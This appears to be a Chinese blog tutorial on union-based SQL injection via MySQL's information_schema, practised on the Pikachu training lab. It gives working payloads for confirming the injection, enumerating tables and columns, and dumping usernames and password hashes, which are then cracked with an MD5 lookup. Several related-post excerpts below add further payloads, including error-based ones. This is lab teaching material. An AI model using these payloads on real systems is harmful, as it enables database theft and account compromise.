Information_Schema注入

最新推荐文章于 2024-01-30 14:36:54 发布
最新推荐文章于 2024-01-30 14:36:54 发布
阅读量312 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45680080/article/details/102864565
版权

Information_Schema注入
information_schema简单介绍:
打开MySQL数据库——在第二行mysql>处输入show databases(查看在MySQL上的数据库)——在第二行mysql>输入use information_schema;——进入之后在第四行mysql>输入show tables(查看该数据库的表格)——在第三行mysql>输入desc tables(查看该表格字段,查看其数据库的对应的表的名称、类型、默认引擎等等)——第三行mysql>输入desc COLUMNS——(与查看表类数据库的名称,以及表相关列的信息通过columns的表来进行相关的记录)

Xxxx%’ or1=1 #
xx型测试:
= (’’)
xx’) or 1=1 #

演示
#获取表名:
select id,email from member. where username = ‘kobe’ union select table_ schema, table_ name from
information schema. tables where table_ schema=‘pikachu’ ;(通过该操作查看pikachu数据库有多少张表以及表的名称是什么)
操作:
在MySQL数据库的第七行mysql>输入use pikachu(使用pikachu的数据库)——第五行mysql>将select id,email from member. where username = ‘kobe’ union select table_ schema, table_ name from
information schema. tables where table_ schema=‘pikachu’ ;输入(查看表的名称)【通过联合查询跨数据库到information_schema的tables表格获取相关信息的操作】!

实际操作
在pikachu中SQL-inject字符型注入中输入“’”字符——查看返回界面确认存在注入——确认其为字符型注入——再在字符型注入查询栏输入kobe’or 1=1#点击提交查询变例出数据——继续获取其基础信息,查询栏输入kobe’ order by 数字#查询字段信息——确认存在字段继续联合查询——(首先确认其数据库名称)——查询栏输入kobe’ union select database(),user()#查找到该数据库名称输入'得到的返回查询结果
变例出相关数据
确认存在字段
获取表格相关信息
找到数据库名称

进行联合查询
#获取字段名:
select id,email from member where. username =. ’ kobe’ union select table_ name,column_ name from
information_schema. columns where table_name= ‘users’;
test payload:
kobe" union select table_name, column_name from Information. schema. columns where table_name= ‘users’#
#获取内容
select id,email from member where username = ‘kobe’ union select username, password from users;
test. payload:
kobe’ union select username, password from users#

操作:
将“kobe’ union select table_schema, table_name from information_schema. tables where table_schema=‘pikachu’#;”放入pikachu字符型注入查询栏——得到pikachu所有表的名称——查询表的clumn表里的字段输入:‘kobe’ union select table_name, column_name from information_schema. columns where table_name=‘users’# ;得到相关字段名称username名称及e-mail名称——查询栏再次输入kobe’ union select username, password from users#——得到username以及用户加密邮箱密码——将该加密邮箱用md5解密CMD5解密得到密码。
得到username和邮箱加密密码信息
加密密码查询结果

Oliveabercrombie
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
information_schema注入
北冥有鱼
03-30 4958
上一篇文章提到过,information_schema是mysql自带的一个表,这个表里存放了大量信息。 我们可以进去这个数据库简单的看一下 然后输入 show tables, 能看到这里面有很多的表,我们先来看一下tables这个表 可以发现这里面有很多的字段,这些字段包含了这个数据库的名称,这个数据库里的表的名称,表的类型,默认的引擎,版本等等。。这些东西,都会放到这个表里面 还有一...
SQL注入information_schema的作用
weixin_54992237的博客
11-13 1276
实验步骤 information_schema数据库是MySQL自带的,MySQL 5以下没有这个数据库,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。也就是说information_schema中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。在INFORMATION_SCHEMA中,有数个只读表。 在phpmyadmin中,在左侧点击inform...
Sql注入前置知识之information_schema数据库
BetsyMyGirl的博客
11-30 1389
概述 Mysql5.0以上, Mysql自带了Information_schema这个数据库, 5.0以下是没有的,information_schema 数据库跟 performance_schema 一样,都是 MySQL 自带的信息数据库。其中 performance_schema 用于性能分析,而 information_schema 用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等。 实际运用 select table_name from information_
SQL注入--information_schema注入
arissa666的博客
07-16 389
mysql5.0版本安装之后会有自带的数据库information_schema,存储的是表名和表字段。上面能看到有pikachu数据库里面有users表,根据表名查询,获取表里的字段名。思路:确定数据库,数据库表名,数据库字段名,在用表名字段名查询到字段值。用联合查询语句补齐注入点,能查到pikachu数据库下面有哪些表名。用数据库名字在查数据库有哪些表,用到tables表里面的。查到的密码用cmd5解密就可以。根据字段名,查询到字段值。先确定注入点数据库名字。
SQL注入--详解information_schema数据库在SQL注入中的作用(以dvwa靶场为例)
最新发布
m0_62959190的博客
01-30 802
上面的pyload意思是从tables表筛选名为dvwa库和table_name字段的表。(COLLATE utf8_general_ci,这个不用管,编码问题)上面的pyload就是从columns表中筛选users表下的列名。常规顺序:爆库名--爆表名--爆列名--拖数据。schemata表存放了所有数据库的名字。tables表存放了数据库中的所有表名。columns表存放了数据库中所有列名。一、schemata表。三、columns表。
SQL注入之MYSQL注入总结-20240517更新mysql可报错注入函数
qq_39764475的博客
08-12 2083
简介 information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息。 让我们从爆破表名到了可以直接查询。 information_schema是MySQL5.0以上数据库独有,MYSQL4.X的没有,只能进行对库名、表名、列名暴力破解。 基本使用 基本语法 1.建立数据库 mysql> create database mysqltest; Query OK, 1 row affected (0.00 sec) 2.查询所有数据库 mysql> show d
information_schema数据库在SQL注入中的应用.docx
06-11
在 SQL 注入攻击中,information_schema 数据库中的这三张表扮演着关键的角色。攻击者可以通过查询这些表来获取数据库、表和字段的信息,从而实现 SQL 注入攻击。因此,在防止 SQL 注入攻击时,需要对信息架构数据库...
php手工注入.doc
11-29
由于非`root`权限,攻击者无法直接访问所有信息,但他们注意到MySQL 5.0及以上版本都包含一个名为`information_schema`的虚拟库,其中存储了所有数据库的相关信息。于是,他们尝试利用这个库来列举出数据库中的表名...
第六节 GET报错注入-01
09-15
- 获取表名:URL中的`id`参数可以被构造为`0' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),...
MySQL五种报错注入1
08-04
SELECT DISTINCT CONCAT(0x7e, table_name, 0x7e) FROM information_schema.tables WHERE table_schema = DATABASE() LIMIT 0, 1; ``` 这将返回当前数据库的第一个表名。 6. **暴露表的字段名** 通过`...
web-报错注入-皮卡丘靶场
07-15
`admin' and updatexml(1,(select concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),0x7e)),1)`这个Payload则更进一步,尝试获取数据库`pikachu`中的第一...
information_schema过滤与无列名注入
snowlyzz的博客
09-06 1271
information_schema过滤与无列名注入
mysql注入information_mysql手注入information_schema数据库详解
weixin_35659005的博客
02-03 415
一、作为一个半道出家的萌新,深知在二、MySQL知己知彼,百战不殆,要想玩好SQL注入必须了解1、库(database):MySQL图书馆:而在数据库中它是这样的:2、表(table):表可以理解为存在于库中的二级目录,接上例子:类似于图书馆里的的书架,一个书架就是一个表,书架上贴的分类标签就是表名。书架:而在数据库中是这样的:3、列(column):列是存在于表中的目录,一个表中存在一个或多个列...
MYSQL-INFORMATION_SCHEMA信息数据库(MYSQL注入猜解)
Quantum Intelligence
08-07 5521
MYSQL ROOT权限注入的时候需要用到的系统表 ....通过以下这些表就可以猜解到有那些库 有那些表 有那些字段最后猜解数据....目录23.1. INFORMATION_SCHEMA表 23.1.1. INFORMATION_SCHEMA SCHEMATA表 23.1.2. INFORMATION_SCHEMA TABLES表 23.1.3. INFORMATION_SCHEMA C
mysql手工注入的详细解析和 information_schema表的作用
收集盒 Book box
11-20 2343
关于mysql手工注入的详细解析和information_schema表的作用。 基础文章, by whoami.  mysql 4.0以上支持union 4.1以上支持子查询 5.0以上有了系统表 --------------------------------------------------------------------------------------
sql注入总结
wuqiongrj的博客
07-22 7691
本实验测试是基于sqli-labs的实验环境 环境配置:php+mysql 环境搭建请参考 http://www.freebuf.com/articles/web/34619.html   Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行的sql命令的目的   sql注入分类: 基于联
sql注入information_schema数据库)
qq_43814486的博客
03-31 2919
1.union语句 该语句可以使两个语句联合起来,但是该语句有一个前提,就是union后边跟的字段数必须要和前面对应,也就是说要知道前面的字段个数,然后对应上,这里可以用order by,错误的话会出现类似以下样子,说明没有第四字段。 这时候再试试三: 他就不会有报错,说明有三个字段,所以就可以用 union select 自己想要的东西了,比如user(),database(),versio...
SQL注入篇——对information_schema数据库的解析
爱国小白帽
01-07 1963
information_schema数据库是个临时数据库,里面的一些信息是随时改变的 其中重要的表有: SCHEMATA表 ---SCHEMATA表提供了所有数据库的信息。 select schema_name from information_schema.schemata; 列出所有数据库——效果等同于show databases; TABLES表 ---TABLES表提供了关于数据库中的表的...
nformation_schema查询
07-27
回答: 从引用\[1\]和引用\[2\]中可以看出,这是一些关于information_schema数据库的查询语句。information_schema是MySQL数据库中的一个系统数据库,它包含了关于数据库、表、列等元数据的信息。引用\[1\]是一个查询语句,用于获取sqli数据库中名为user的表的列名。引用\[2\]是另一个查询语句,用于获取除了一些系统表之外的所有基本表的数量。引用\[3\]是一个授权语句,但由于权限不足,导致访问被拒绝。 #### 引用[.reference_title] - *1* [SQL注入information_schema的作用](https://blog.csdn.net/weixin_49562509/article/details/121003972)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [MySQL如何绕过授予information_schema中对象时报ERROR 1044(4200)错误](https://blog.csdn.net/weixin_30994645/article/details/113139840)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值